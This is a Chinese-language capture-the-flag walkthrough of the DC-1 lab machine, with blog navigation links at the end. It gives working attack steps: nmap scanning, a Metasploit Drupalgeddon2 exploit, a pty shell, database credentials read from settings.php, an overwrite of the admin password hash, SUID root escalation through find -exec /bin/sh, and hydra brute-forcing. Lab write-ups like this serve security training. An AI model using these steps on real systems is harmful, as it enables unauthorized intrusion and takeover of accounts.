DC-1

环境准备

 

DC-1靶机下载地址:https://www.five86.com/dc-1.html

 

虚拟机网络链接模式:桥接模式

 

kali IP 192.168.1.199

 

靶机 IP 192.168.1.248

 

信息收集

 

使用Nmap进行扫描

 

nmap -sP 192.168.1.0/24

DC-1

 

nmap  -A 192.168.1.248

DC-1

 

 

浏览器访问192.168.1.248

DC-1

 

 

 

访问该站点并查看robots.txt敏感文件

192.168.1.248/robots.txt

DC-1

 

 

 

依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号

 

DC-1

 

 

 

漏洞利用

 

寻找drupal 7.X版本漏洞,并进行利用

DC-1

 

 

 

使用MSF搜索相关模块并进行利用

 

search drupal	//搜索drupal文件

use exploit/unix/webapp/drupal_drupalgeddon2

set RHOST 192.168.0.109

run

shell

python -c "import pty;pty.spawn('/bin/bash')"

DC-1

 

 

DC-1

 

 

在网站根目录下发现flag1.txt文件,查看提示寻找站点的配置文件

DC-1

 

 

Drupal的默认配置文件为/var/www/sites/default/settings.php并查看

DC-1

 

 

 

根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手

 

mysql -u dbuser -p //密码R0ck3t

DC-1

 

 

show databases;

use drupaldb;

show tables;

DC-1

 

 

select * from user;

select * from users;

DC-1

 

 

在此我们可以参考官方文档对drupal置换密码,参考链接

站点路径下执行:php scripts/password-hash.sh 新密码

php scripts/password-hash.sh 123456

DC-1

 

 

use drupaldb

 

update users set pass="$S$DrKHI8kGgiCdo.EMjUOZCBaJvxlGBmEQaQQZVn9OgWeTZGQNrobN" where name="admin";

DC-1

 

 DC-1

 

 

登录网站,搜索发现Flag3,并根据提示需要进行SUID提权

DC-1

 

 

 

权限提升

 

find / -perm -4000 2>/dev/null

DC-1

 

 

 

对find命令进行测试并获取root权限

 

touch 666

find / -name 666 -exec "whoami" ;

find / -name 666 -exec "/bin/sh" ;

DC-1

 

 DC-1

 

 DC-1

 

 

查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破

DC-1

 

 

 

ssh flag4@192.168.1.248

DC-1

 

 

回到root用户家目录发现Flag5

DC-1

 

 

 

上一篇:兴达易控300PLC转以太网模块在污水处理程序里的应用


下一篇:手动部署 OceanBase 单节点